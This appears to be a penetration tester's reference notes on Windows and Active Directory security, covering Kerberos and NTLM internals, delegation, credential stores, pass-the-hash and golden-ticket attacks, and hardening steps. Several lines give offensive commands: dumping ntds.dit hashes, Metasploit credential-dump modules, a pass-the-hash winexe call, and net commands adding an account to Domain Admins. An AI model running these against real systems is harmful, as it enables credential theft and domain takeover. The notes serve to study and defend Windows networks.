Troubleshooting hints: Use UPPERCASE domains, and use the FQDN for the target hostname/domain.


About Windows

Active Directory domain structure

Технический справочник по Active Directory для Microsoft Windows Server 2003 Логическая структура Active Directory

  • Active Directory (AD) is a forest with several root domains (e.g. for different companie’s deparments).

    Each domain is ruled by some Domain Controller (DC). In forest all DC replecates data between themselves (all DC trusts to each other).
    Some DC are selected as “masters” (or PDC - primary domain controller). They may carry out some actions that can fulfilled only on master DC.
    (forest level: schema master, domain naming master; domain level: RID master, PDC emulator, infrastructure master) (AD FSMO roles)

  • AD catalogs:

    • domain catalog (contains security descriptors) - stores information about users/groups/computers
    • global catalog - a distributed data repository that contains a searchable, partial representation of every object in every domain in a multidomain Active Directory Domain Services (AD DS) forest. (the global catalog is stored on domain controllers)
    • general scheme catalog (???) - contains scheme of the whole forest (scheme - list of available object’s attributes) (general for the whole forest) (its permissions inherited from root domain catalog)
    • general configuration catalogue (???) - information about forest configuration (domaines structure, replication topology, …) and configuration of some applications (e.g. Exchange server, ISA, SharePoint, …) (its permissions inherited from root domain catalog)
    • applications partitions catalogue (???) (e.g. partition for DNS service) (permissions inheritence specified separately from some domain catalog)
  • LDAP (Lightweight Directory Access Protocol) - an open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network.

  • Hierarchy:

    • c= country/region - recognized only by LDAP
    • dc= domain component (o= organization - “o” may be used by LDAP instead of dc)
      domain component has its own GPO (+ inherited GPO)
    • ou= organizational unit - hierarchy (tree) within a domain. OU is a container that can be hold other objects and is used to group objects together for administrative purposes. (examples: set of computers, contacts, groups, printers, users, shared folders, …)
      Domain’s ACL lists can refer to OU in order to set permissions.
    • cn= common name: user, group, computer or container.
      Container is smth similar to OU, except for linking GPO (Group Policy Object) and delegating administration to a container. Container can be “promoted” to OU. (What does CN stand for)
  • Examples of full names:

    • each object has its GUID (unique 128-bit string)
    • dn - destinguished name: /O=Internet/DC=COM/DC=SavillTech/CN=Users/CN=John Savill
      CN=John Savill,CN=Users,DC=SavillTech,DC=COM,O=Internet
    • LDAP url: LDAP://,cn=JSavill,dc=SavillTech,dc=com
    • LDAP canonical name:
    • UPN - user’s principal name:

RID cycling - domain objects enumeration attack by bruteforcing or guessing SIDs (because RID is sequential)
impacket script: "DOMAIN/username:passwd@"

SID - security identifier

SID - Security identifier, e.g. S-1-5-21-549688327-91903405-2500298261-1000 - S-1-5-21 used for most accounts, 549688327-91903405-2500298261 is a domain SID, 1000 - RID - account’s id.
Some standard SIDs:

  • User's SIDs:
    Administrator S-1-5-21-domain-500
    Guest S-1-5-21-domain-501
    KRBTGT S-1-5-21-domain-502
    Creator Owner S-1-3-0
    Interactive S-1-5-4
    Anonymous S-1-5-7
  • Group SIDs:
    Everyone S-1-1-0
    Enterprise Domain Controllers S-1-5-9
    Authenticated Users S-1-5-11
    Domain Admins S-1-5-21-domain-512
    Domain Users S-1-5-21-domain-513
    Domain Computers S-1-5-21-domain-515
    Domain Controllers S-1-5-21-domain-516
    Cert Publishers S-1-5-21-domain-517
    Schema Admins S-1-5-21-domain-518
    Enterprise Admins S-1-5-21-domain-519
    Group Policy Creator Owners S-1-5-21-domain-520
    Administrators S-1-5-32-544
    Users S-1-5-32-545
    Guests S-1-5-32-546
    Account Operators S-1-5-32-548
    Server Operators S-1-5-32-549
    Print Operators S-1-5-32-550
    Backup Operators S-1-5-32-551
    Replicators S-1-5-32-552
    Pre-Windows 2000 Compatible Access S-1-5-32-554
    Remote Desktop Users S-1-5-32-555
    Network Configuration Operators S-1-5-32-556
    Incoming Forest Trust Builders S-1-5-32-557
    Enterprise Read-only Domain Controllers S-1-5-21-domain-498
    Read-only Domain Controllers S-1-5-21-domain-521
    Allowed RODC Password Replication Group S-1-5-21-domain-571
    Denied RODC Password Replication Group S-1-5-21-domain-572
    Event Log Readers S-1-5-32-573

Microsoft/Windows authentication/security tokens, …

Usefull articles:

Permissions vs Privileges: permissions apply to objects, privileges (rights) apply to user account actions. A privilege overrides a permission.

Windows tokens

Usefull artices:

An access token contains a security identifier (SID) for the user, all of the SIDs for the groups to which the user belongs, and the user’s privileges. Whenever a thread or process interacts with a securable object or tries to perform a system task that requires privileges, the operating system checks the effective access token to determine its level of authorization:

  • Primary token - access token typically assigned to a process to represent the default security information for that process.
    Filtered token - access token with admin privileges removed (Win Vista +)
  • Impersonation token - access token used by thread temporary to operate on behalf of other impersonated user.
  • Restricted token - a primary or impersonation access token that has been modified by the CreateRestrictedToken function in order to restrict process/thread in its ability to access securable objects or perform privileged operations.

After security token is set, any changes to account will not take effect until new token will be generated at next relogin action.

Windows tokens can be of 4 impersonation levels:

  • Anonymous (never been supported) - the client is anonymous to the service. The service can impersonate the client but the impersonation token does not contain any information about the client.
  • Identify - the service can get the identity of the client and can use this information in its own security mechanism, but it cannot impersonate the client.
  • Impersonate - the service can impersonate the client. If the service is on the same computer as the client process, it can access network resources on behalf of the client. If the service is on a remote computer, it can impersonate the client only when accessing resources on the service’s computer.
  • Delegate (Kerberos only - NO NTLM) (Windows 2000 +) - the service can impersonate the client not only when it accesses resources on the service’s computer but also when it accesses resources on other computers.
    Check Kerberos delegation for more information.

RDP - the only microsoft service, which transfers user’s credentials (login and password (or ntlm hash)) to remote computer.
security concern: RDP-mitm can result in leaking plaintext login and password.


Related phrases: NT Lan Manager / Integrated Windows Authentication / HTTP Negotiate authentication / NT Authentication / NTLM Authentication / Domain authentication / Windows Integrated Authentication / Windows NT Challenge-Response authentication / Windows Authentication

Be carefull often people mean “NetNTLM” while saying “NTLM”. NetNTLM is a challenge-response mechanism, it can be easily eavesdropped or MITMed in order to further bruteforce. NTLM required time synchronization, the difference must not exceed ≈ 30 minutes.

Username and domain are always passed in plaintext during authentication.

Authentication by IP address use NTLM by default (not Kerberous) (e.g. authentication to smb share).

Windows RDP client’s SSO is based on passing the actual username and password/ntlm credentials to the server. Kerberous is NOT supported at all.

Microsoft Negotiate - selects between kerberos (preferable) or NTLM authentication and their versions.


  comments hash algorithm hash value client challenge response key length response algorithm response value length
LM password case insensitive
password = 7 symbols + 7 symbols
MS-CHAP == NTLM 0.12
DES (ECB mode) 64 + 64 bit no 56 + 56 + 16 bit DES (ECB mode) 64 + 64 + 64 bit
NTLMv1 MS-CHAPv2 == NTLMv1 + challenge-response md4 128 bit no 56 + 56 + 16 bit DES (ECB mode) 64 + 64 + 64 bit
NTLMv2   md4 128 bit yes 128 bit HMAC_MD5 128 bit
kerberos AES128_HMAC_SHA1, AES256_HMAC_SHA1 md4 128 bit yes 128 bit RC4_HMAC_MD5 36 byte

Default ciphers:

Windows XP client: LM/NTLMv1 service: LM/NTLMv1/NTLMv2
Windows 2003 client: NTLMv1/NTLMv2 service: LM/NTLMv1/NTLMv2
Windows Vista, … / Server 2008, … client: NTLMv2 service: LM/NTLMv1/NTLMv2

NTLM authentication:
(pic from @Benjamin Delpy pres)


SC = 8-byte server challenge (random)
CC = 8-byte client challenge (random)
CC* = (X, time, CC2, domain name)
v2-hash = HMAC-MD5(NT-hash, user name, domain name)
LMv2 = HMAC-MD5(v2-hash, SC, CC)
NTv2 = HMAC-MD5(v2-hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*


C = 8-byte server challenge (random)
K1 | K2 | K3 = LM/NT-hash | 5-bytes of 0
response = DES(K1, C) | DES (K2, C) | DES (K3, C)


Windows credential data chart:


Usefull artices:

Session Tickets (kerberos protocol). Ticket contains its start and expiration dates, session key for server to authenticate client (session key is encrypted on server’s key, known only to server and KDC).

  • Session tickets are used only to authenticate new connections with servers (when a session ticket expires, ongoing operations are not interrupted).
  • Session ticket can be renewable or not (if not - after expiration user has to request new ticket). Renewable ticket can be renewed just before the renew-till time (user’s long-term key will not be required).
  • Session ticket’s mechanism requires time synchronization for Kerberous realm (by default GPO sets maximal time difference to ≈ 5 minutes).

Kerberous authentication: (pic from @Benjamin Delpy pres)

  ticket encryption PAC KDC signature PAC server signature
TGT krbtgt hash krbtgt hash krbtgt hash
TGS target’s hash krbtgt hash target’s hash

Typical user’s authentication process (KDC usually consolidates AS and TGS services):

Kerberos authentication workflow:

  1) user’s password -> hashing -> long-term key (e.g. NTLM hash)    
Authentication Service (AS) Exchange -) Kerberos pre-authentication - authenticates client, before producing TGT ticket. Enabled by default.
  If preauthentication is disabled actual authentication will be produced at the stage of decrypting session key on user-side. (Attacker will have no means to decrypt it)
2) request TGT ticket for using TGS service (service for requesting session keys for other services)
-> user gets TGT (Ticket granting ticket). It contains logon session key encrypted on user’s password (for user-side) and encrypted on service’s password (krbtgt) for KDC.
  Session key will be used for communication between user and KDC.
Ticket-Granting Service (TGS) Exchange 3) user requests KDC (with his TGT) for service Bob TGS
-) KDC generates session key for user to use a service Bob, KDC does NOT check access privileges, NO authentication, NO authorization
-> user gets TGS ticket for service Bob. It contains session key for service Bob encrypted on user’s password (for user-side) and on service’s password for service-side.
  Session key will be used for communication between user and service Bob.
Client/Server (CS) Exchange 4) user requests a service Bob (using the ticket for the service)
-) service performs user authorization
  • KDC can generate for a user referral ticket (a TGT encrypted with interdomain key shared between KDCs). It enables user to request other domain’s KDC for keys and tickets in other domain’s services.
    For this to operate domains must share interdomain keys (e.g. establish trust relationship).
    In case there is multiple domains, user may get referral ticket to domain’s B KDC, that will give the referral ticket to domain C, …

Unconstrained\constrained Kerberos delegation (article with good explanation)

Information here may be inaccurate, sorry guyes and ladies.

SPN - Service Principal Name (e.g. service/host.domain, ldap/my_computer.lab)

  • The situation: User — authenticates at —> Service1 — works on behalf of user —> Service2
    e.g. user got access to frontend server and frontend server got access to backend server on behalf of that user

  • Solution:

    According to Kerberos traditional standard:

    • Proxy tickets - tickets got by client (hand by KDC) for frontend server to access backend server on user’s behalf. User request special proxy ticket to hand it to frontend server.
      Problem: user must know about backend service and request appropriate ticket for frontend server. (If proxy tickets is allowed for the client PROXIABLE flag will be set in TGT)
    • forwardable tickets, unconstrained delegation

    Microsoft’s Active Directory solutions:

    • unconstrained delegation, forwardable tickets (very insecure) - “trust this computer for delegation to any service (Kerberos only)” - Kerberos passes user’s “forward TGT” ticket with TGS. “Forward TGT” generated during user’s Service1 TGS ticket generation (it is called forwardable TGT)
      security concern: therefore Service1 compromisation results in ability to steal any user’s TGT ticket (attack is restricted to users visited the service)


      1. (Microsoft/MIT) forwardable TGT has FORWARDABLE flag, forwarded TGT or any its derivatives (e.g. TGS) has FORWARDED flag. Forwardable TGT passed to service to work on behalf of user.
      2. (MIT) during AS request user appends Service1’s network address (not ip, SPN most likely), which will be inserted into TGT and will allow Service1 to use it.
    • constrained delegation - “trust this computer to specified services only”
      Constrained delegation gives to the service/SPN the permission to impersonate any user before allowed and specified services/SPNs (every SPN has its own list).
      Constrained delegation is restricted to services in a single domain.

      • (S4U2Self) protocol transition extension - using any authentication
        Service1 implements its own authentication mechanism (anything not even Kerberos) and upon successful authentication of some User1 requests Kerberos User1’s Service1 TGS ticket. Protocol transition is used to initialize a WindowsIdentity object with valid user ID/account as it has just accessed Service1 using Kerberous protocol.
        technically: Service1 requests Kerberos for user’s TGS ticket to Service1 (identity Service1 specifies any UserID/UPN in its request).
        security concern - Service1 can impersonate any user before any allowed Service2.

      • (S4U2Proxy) native constrained delegation extension - Kerberos only
        Service1 requests Kerberos for User1’s Service2 TGS ticket specifying User1’s Service1 ticket obtained either through KRB_TGS_REQ to Service1 or the protocol transition extension.
        security concern - Service1 can impersonate any user visited Service1 before any allowed Service2.

      • Constrained delegation can be used without protocol transition extension.
      • Only services with SPN can be added to contrained delegation list
      • Only service with SPN can be granted delegation right (constrained/unconstrained)
      • Constrained delegation restriction: any user can be flagged as not permitted for delegation.
      • Delegation works only for Windows 2000 +. User’s and service’s accounts must be enabled for delegation. If service works under Local System account, the computer must be trusted for delegation)

      security concern:
      Kerberos requires SPN to generate a TGS ticket to service (using SPN kerberos destinguish services)
      By default, all of the standard services use a HOST-based SPN, which is configured when the operating system is installed. Therefore if you have delegation access to service XXX/host.domain you also have delegation access to YYY/host.domain

For some users impersonation can be prohibited in active directory (and must be, e.g. Domain Administrators).

Trusted Computing Base (TCB) privileges - an account with TCB privileges can act as part of the operating system when it performs operations (e.g. impersonation operations).

Services can run under these local accounts: Local System, Local Service, Network Service or under AD (Active Directory) managed account.

Security drawbacks


  • centralization

    • SSO - Single-Sign On - is the key reason attacks similar to pass-the-hash exists
    • DC and Kerberos servers are the key point of failure (or comprometation)
    • Kerberos relies on time synchronization (time difference below 5 minutes)
  • encryption problems

    • microsoft introduced encryption at smb 3.0, however it breaks compatibility with old systems
    • by default client does not sign its messages. Only domain controller sign its messages, however it is not required by client-side.
      LDAP signs its messages
    • lots of proprietary protocols not secure, however required because of backward compatibility
  • backward compatibility - lots of old decisions can not be abandoned

realization key-points, weaknesses and vulnerabilities

Windows credentials storages

  • LSA (Local Security Authority) storage (includes lsass.exe process) - the process managing authentication. Its memory dump may contain a lot of sensitive information (e.g. usernames, passwords, ntlm hashes, tickets, …)
    Protected Group protects lsass from storing user’s hash after user logged off (lsass process will be cleared).
  • ntds.dit + SYSTEM files - contains sensitive data for Active Directory catalogue (at Domain Controller) (Как устроен ntds.dit? (хабр))
    SAM database + SYSTEM - Security Account Manager database - used to store local user accounts (contain data (e.g. NTLM hashes) encrypted using a 128-bit RC4 encryption key) (SAM is mounted into windows registry)
    ntdsxtract - example: python ntds.dit.export/datatable.4 ntds.dit.export/link_table.7 ./work --name USERNAME --syshive SYSTEM --supplcreds --passwordhashes --lmoutfile ./lm --ntoutfile ./nt --pwdformat john
  • LSA secrets - windows store here credentials for services, that configured to run under specified user and password for autologon feature
    credentials can be dumped through post/windows/gather/lsa_secrets
  • Cached logon credentials - by default windows stores data for last 10 logged in users with their passwords(hashes)
    reason: enables users to login again without connection to Domain Controller
    cached creds can not be used for pass-the-hash, however can be bruteforced (can be dumped via module post/windows/gather/cachedump)
    stored at HKEY_LOCAL_MACHINE\SECURITY\Cache in format: RC4(username | nt-hash) (mscash2) at lsass.exe process or NL$ registry section
  • Credential manager - a special vault, where can be stored any data by any application (e-mail, web authentication, form autocomplete, remote desktop passwords, …), passwords for saved network passwords, scheduled tasks, … Data is stored in ≈plain text


  • pass-the-hash
    Keys: NTLM is RC4-HMAC (without SALT), AES keys (they use 4096 iterations of PBKDF2 (salted))
    ntlm hashes is everything attacker needs to pass challenge-response mechanism
    overpass-the-hash - when you use pass-the-hash in order to get the kerberos ticket.
  • pass-the-ticket - in case we stole the TGT ticket (or at least session TGS ticket for service A) we can act on behalf of user
  • TGT ticket contains all account’s policy (disabled, expired, group membership, etc. in the format of PAC data structure) - it is ALL stored at client-side
    Golden ticket - customly constructed ticket. Attacker who leaked krbtgt hash (from KDC) can generate TGT tickets for any user (even not existant) with any groups and metadata. It is a very stable method to get persistant in the domain.
    Silver ticket - similar idea to golden ticket, except that service’s hash is used to generate ticket to access service. The main purpose is stealth.

    Kerberos 5 has no guaranteed means to validate the account at KDC when presented with a TGT.
      If the TGT is older than 20 minutes, the KDC will validate the account before issuing TGS tickets.
        solution: check username and user’s RID during golden-ticket generation
      All TGS tickets issued during this 20 minutes will be valid until expiration date (usually 10 or 6 hours).

    Kerberos & KRBTGT: Active Directory’s domain kerberos service account
    KDC’s long-term key (krbtgt) does NOT change for years (because it is changed only during domain functional level upgrade or at recovery process).
    Resetting the KRBTGT account password is only supported in a WS2008+ domain functional level. When the DFL is raised from 2003 to 2008 (or higher), the KRBTGT account password is changed automatically.
    In any domain exists two accounts: krbtgt and secondary krbtgt_NNNNN, if you change krbtgt password, the TGT tickets will be still valid, because of krbtgt_NNNNN which will have old password. However if your domain has been compromised, krbtgt password must be changed twice in order to change passwords for both accounts. Choosing this path will likely require rebooting application servers (or at least re-starting application services to get them talking Kerberos correctly again).

  • pass-the-cache - some technic related to AD ticket’s cache

Authentication methods comparison:

  default lifetime multiple targets realtime checks can be found at
password 42 days yes yes -
pass-the-hash 42 days yes yes AD, client mem
pass-the-ticket (TGT) 10 hours yes no (20 min later) client mem
pass-the-ticket (TGS) 10 hours no no client mem
golden ticket 10 years yes no -


  • Each machine in the domain (every server, every workstation) every 20-90 minutes requests Domain Controller for fresh GPO (group policy) to be applied (with localsystem NT SYSTEM rights).
    That is why MITM, spoofing, smb relay/hijacking, etc. attacks DO VALUE.
    SMB relay/hijacking - MITM between client and service. (one of implemented defenses is filtration of computer’s connection to itself)

    SMB relay custom patches:

    • MS08-068 - prevents relaying back the challenge keys from where they were issued (however it does not stop cross protocol attack variation)
    • MS16-075 - fix cross-protocol back smb-relay variation
    • MS16-077 - prohibit WPAD resolution through netbios
  • NTLM problems (pass-the-hash and offline netNTLM bruteforce) is widespread. It concerns a lot of services: VPN, email, SMB share, AD, Microsoft accounts, …, everything with NTLM/domain authorization.
  • Windows will use NTLM for any file:// urls in corporate network (e.g. browsers Edge/IE, outlook, … will follow file:// links like a smb share) OR web-site may request NTLM authentication. Leak-NTLM-hash-via-HTML
    impact: user deanonymization (username, domain), relay attack, password brute force
    defense: forbid any smb traffic out of your intranet ! - test your browser for leaking netNTLM hash via file://. (Caution probably it WILL leak your netNTLM (объяснение (RU)))

  • Windows name resolution order (What is LLMNR & WPAD and How to Abuse Them During Pentest ?):
    DNS names always has trailing dot (e.g., netbios names has NO trailing dot.
    impact: cross-domain policy bypass -> impact: session manipulation, phishing, etc.
    defense: prohibit broadcast netbios-ns resolve by means of group policy on every station

    • C:\Windows\System32\drivers\etc\hosts
    • DNS cache
    • DNS server
    • C:\Windows\System32\drivers\etc\lmhosts.sam
    • LLMNR broadcast query
    • NetBIOS-NS broadcast query
  • Windows prefer netbios-ns over DNS. Attacker may easily implement netbios name spoofing attack (netbios-ns is based on broadcast requests).

Enhancing windows security (general recommendations)

Awesome Windows Domain Hardening Awesome - awesomeness

Usefull articles (general security):

Usefull articles (concrete recommendations):


  • disable broadcast netbios-ns to protect from spoofing. As a result only DNS will remain as resolution service.
    set to enabled GPO: Computer Configuration\Administrative Templates\Network\DNS Client\Turn Off Multicast Name Resolution

  • NTLM protection:

    • disable storing in memory (lsass.exe) cleartext passwords:

      • Install KB2871997 (Win7, WS2008R2) (Windows8.1+, WS2012+ has it by default) (2014)
      • reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 (reboot is required)
    • set timeout to remove credentials (e.g. ntlm) from lsass: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v TokenLeakDetectDelaySecs /t REG_DWORD /d 30 (requires KB2871997) (KB3126593 (2016) enables this option automatically)
      not recommended for user’s laptops, because it will complicate consequent user’s logon in case Domain Controller became unavailable

    • disable LM-hash generation: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLmHash /t REG_DWORD /d 1 ((Vista/MS2008+ disabled by default))
    • fully disable support for LM-hash authentication: reg add HKLM\System\CurrentControlSet\control\LSA /v LMCompatibilityLevel /t REG_DWORD /d 5
    • set at least NTLMv2 for GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network Security: Restrict NTLM: NTLM authentication in this domain
    • set to disabled GPO: Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\Store password using reversible encryption for all users in the domain
  • Mimikatz protection:

    • configure Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Debug programs - options controls users with SeDebugPrivilege
      SeDebugPrivilege allows to debug processes owned by other users (by default only administrators group privilege). security impact: user can debug other privileged process and run privileged commands on behalf of other user.
      fully disabling SeDebugPrivilege can break some functionality, e.g. local administrators require this privilege to upgrade software like Microsoft SQL Server.
    • set to enabled GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Do not allow storage of passwords and credentials for network authentication
      it prohibits storing passwords in Credential Manager and storing passwords for schedulled tasks
      as a result users will have to enter passwords to access shares, etc. once again
    • set to enabled GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Network Security: Do not store LAN manager hash value on next password change
    • reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 1 - run several processes (e.g. lsass.exe) as protected process - Configuring Additional LSA Protection - this will rectrict process to load unsigned code (anyway, signed mimikatz with expired certificate can deal with it using driver trick, however it will make some noise in event logs)

    • reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 /v NtlmMinClientSec /t REG_DWORD /d 0x20000000 - require 128-bit encryption
      reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 /v NtlmMinServerSec /t REG_DWORD /d 0x20000000 - require 128-bit encryption
  • domain protection:

    • all security patches in your infrastructure must be installed
    • prohibit usage of Domain Administrator’s accounts anywhere except Domain Controllers
      DO NOT use your Domain Admin’s account anywhere except Domain Controller

    • secure ldap:
      disable ldap null base search access
      disable ldap null bind (anonymous)
    • force logoff for idle RDP sessions: configure GPO’s Computer Configuration\Policies\Administrative Templates\Windows Components\Remote Desktop Services\Remote Desktop Session Host\Session Time Limits
    • harden logon possibilities:

      • GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Deny access to this computer from the network
      • GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Deny logon as a batch job
      • GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Deny logon as a service
      • GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Deny logon locally
      • GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Deny logon through Remote Desktop Services
      • GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Enable computer and user accounts to be trusted for delegation
    • restrict RDP access (specifically deny it for not domain users)
    • add privileged users to Protected Users group (WS2012 R2 +) (How to configure protected accounts) (for Win7, WS2008R2 - KB2871997 required)

      This will enhance security a lot:

      • no NTLM, WDigest, CredSSP, only Kerberos authentication
      • Kerberos will use only strong cryptography (no DES or RC4)
      • delegation is prohibited (“Account is sensitive and cannot be delegated” field)
      • long-term keys are disabled, after TGT expiration user will be prompted for password again
      • user’s credentials will not be cached
    • enable for privileged accounts option: Account is sensitive and can not be delegated
    • disable credentials caching for stationary PCs/servers (affected users will not be unable to login into computers while there is no connection to Domain Controller, it is critical for users with laptops):

      • reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v CachedLogonsCount /t REG_SZ 0 (the default value is 10)
      • set to 0 GPO: Computer Configuration\Windows Settings\Local Policy\Security Options\Interactive Logon: Number of previous logons to cache (in case domain controller is not available)
    • disable showing account’s details on the sign-in screen:

      • GPO: Computer Configuration\Policies\Administrative Templates\System\Logon\Block user from showing account details on sign-in - prevents users from showing account details on the sign-in screen
      • GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Don’t display last signed-in - prevents the username of the last user to sign in from being shown
      • GPO: Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Don’t display username at sign-in - prevents the username from being shown at Windows sign-in and immediately after credentials are entered and before the desktop appears
    • block any netbios, 445, … traffic from corporate network to internet using firewall (in order to prevent netNTLM leak and offline bruteforce by an attacker)
  • defensive mechanisms:

    • Windows Defender Credential Guard (WS2016+, Win10+) - Protect derived domain credentials with Windows Defender Credential Guard
    • Restrict with AppLocker applications like procdump, Kaspersky’s debug diagnostic
    • Enable Advanced Audit Policy under Advanced Audit Policy Configuration\Object Access\Audit Kernel Object (L"S:(AU;SAFA;0x0010;;;WD)") - SACL process will log all processes attempting to access lsass.exe process
    • enable PowerShell logging with GPO: Computer Configuration\Policies\Administrative Templates\Windows Components\Windows PowerShell set to *
  • additional protections:

    • disable legacy and broadcast protocols and WPAD
    • enforce SMB signing within domain

Microsoft’s security mechanisms (there is more of them)

Usefull articles:



  • Protected process
  • UAC (User Access Control) (UAC brief summary). When an administrator logs on, the user is assigned two separate access tokens: a full administrator access token and a standard user access token.
    The full administrator access token is not invoked until the user attempts to perform an administrative task. In other words, if you log on as a member of the local administrators group, you will run with your administrative privileges disabled until you attempt to run an application or task that has been marked to require administrative privileges.
    When UAC is enabled, local administrator accounts run as standard user accounts until elevation is required. (Run as administrator - runs application with administrator access token)
  • AppLocker helps you control which apps and files users can run. These include executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers. (Various antivirus vendors also offer their applocker realizations)
  • Device Guard


  • Bitlocker


  • Windows Information Protection (WIP), formerly known as Enterprise Data Protection (EDP)
  • CIG (Code Integrity Guard) - (good to be applied for guarding drivers)
    CIGslip - technic to inject unsigned code into CIG-protected applications. Rough description: attacker can inject code into non-CIG process and afterwards infect CIG-protected process from infected non-CIG process.
  • Trusted Platform Module



  • Windows Server Update Services (WSUS)
  • System Center Configuration Manager (SCCM)

Some (mostly Microsoft’s) “concepts”

  • SOAP (Simple Object Access Protocol). SOAP allows processes on disparate operating systems to communicate using XML
    WS-Management (Web-service management protocol) - inherently this is the expansion of SOAP protocol over HTTP(S)
    WMI (Windows management instrumentation) - Microsoft’s implementation of Web-Based Enterprise Management (WBEM). WMI uses the Common Information Model (CIM) industry standard to represent systems, applications, networks, devices, and other managed components.

  • COM (Component Object Model) - a Microsoft’s framework for developing and supporting program component objects (aimed to provide similar capabilities as CORBA)
  • CORBA (Common Object Request Broker Architecture) - an architecture and specification for creating, distributing, and managing distributed program objects in a network. It allows programs at different locations and developed by different vendors to communicate in a network through an “interface broker.”
    CORBA was developed by a consortium of vendors through the Object Management Group (OMG).
  • DCOM (Distributed COM) (Distributed Component Object Model) - a proprietary Microsoft technology for communication between software components on networked computers (dcomcnfg.exe)
    DCOM is a set of Microsoft concepts and program interfaces in which client program objects can request services from server program objects on other computers in a network

  • RPC (Remote Procedure Calls) - a protocol that one program can use to request a service from a program located in another computer on a network without having to understand the network’s details.
    RPC under the hood: smb connect to DC -> request IPC$ share -> bind to SAMR named pipe -> Makes multiple SAMR queries (EnumDomains, LookupDomains, LookupNames, QueryUserInfo, GetGroupsForUser, …)
    Some MS-RPC require local admin priveleges (e.g. svcctl - manipulate services, atsvc - manipulate tasks, DCOM), others don’t (e.g. samr, lsarpc)
    (samr - Security Account Manager Remote) - query local SAM db (users, groups, …)
    (lsarpc - query Local Security Authority for SIDs, policies, …)


  • WMI works over DCOM, COM/DCOM works over RPC. DCOM requires additional connection (over dynamically allocated port).

    • RPC: service RpcSs, listens 135/tcp port, (uses $IPC share)
    • DCOM: service dcomlaunch works over RPC, uses additional dynamically allocated port (default 1024-65535 scope can be changed in dcomcnfg.exe -> Computers -> My computer -> Properties -> Protocol set -> DCOM protocols -> Properties -> Add range -> reboot)
    • WMI: service Winmgmt + application %systemroot%\system32\wbem\unsecapp.exe
  • MS-SAMR/SAM (Security Account Manager Remote Protocol), MS-LSAD (Local Security Authority (Domain Policy) Remote Protocol)
    both protocols leverage RPC and use SMB (Server Message Block)

  • NetBios - kernel driver netbt.sys

  • MSF (Microsoft Solutions Framework) - Microsoft’s own best practices software development guidance
    MSF had three key elements: it used a lifecycle approach, it embedded risk management into every phase, and it used a team model to assign responsibility
  • MOF (Microsoft Operations Framework) - Microsoft’s specific best practices guidance based on its own internal best practices, the best practices of its consulting arm, of its customers, and combined with ITIL guidance. (mofcomp.exe - MOF compiler)
    MOF has the same three key elements at its core, as MSF

  • IPMI (Intelligent Platform Management Interface) - a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently of the host system’s CPU, firmware (BIOS or UEFI) and operating system
    IPMI sub-system consists of main controller (BMC - Baseboard management controller) - and other management controllers among different system submodules
  • RMCP (Remote Management Control Protocol) - protocol for managing systems with IPMI


Common ports

Port Assignments for Well-Known Ports

wins 42/udp, 42/tcp windows internet name service
Kerberos 88/tcp, 88/udp Kerberos V5 KDC (kerberos has much more ports)
rpc 135/tcp RPC -> COM/DCOM -> WMI
netbios-ns 137/udp, 137/tcp name services - enables fast broadcast lookups on a local network
netbios-dgm 138/udp datagram services - (nobody really know what it is used for ?)
netbios-ssn 139/tcp session services - files copying, directory listings, printer related operations, …
LLMNR 5355/tcp Local Loop Multicast Name Resolution
ldap 389/tcp  
ldaps over SSL 636/tcp  
globalcatLDAPssl 3269/tcp LDAP Global Catalog
WS-Management 5985/tcp (http), 5986/tcp (https)  
microsoft-ds 445/tcp Microsoft directory service + SMB over 445 directly without NetBios (no name resolution by netbios-ns, only ip-address), MS-RPC (use $IPC share)
RDP 3389/tcp rdp
swat 901/tcp samba web administration tool

Console commands

  1. Run dll: rundll32 C:/path/to/my.dll,main argv
  2. To set your locale in terminal run: chcp 1251 (866 ?)
    Cross-encodings: luit - a filter that can be run between an arbitrary application and a UTF-8 terminal emulator. It will convert application output from the locale’s encoding into UTF-8, and convert terminal input from UTF-8 into the locale’s encoding.
    luit ex.: luit -encoding chcp866 pth-winexe -U 'domain/username%lm:nt' // 'dsquery group -name "Administrator" | dsget group -members | dsget user' (luit for cyrillic encodings)
    Default encoding for ‘other’ languages: UTF-16-LE (little-endian), Кирилица в windows: “Lucida Concole”

  3. Environment variables (wikipedia) (переменные окружения (википедия))
  4. runas/sudo - runas /user:localhost\phonexicum cmd.exe

  5. Create user/group/ …

    net user phonexicum my_pass /add # create user
    net localgroup Administrators phonexicum /add # add yourself to administrators
    net user phonexicum my_pass /add /domain
    net group "Domain Admins" phonexicum /add /domain
    net localgroup "Remote Desktop Users" phonexicum /add /domain
    net localgroup "Пользователи удаленного рабочего стола" phonexicum /add /domain
  6. Constructing credential datatypes in powershell:

    # get credentials interactive:
    $creds = Get-Credential
    # non-interactive
    $secpasswd = ConvertTo-SecureString "PlainTextPassword" -AsPlainText -Force
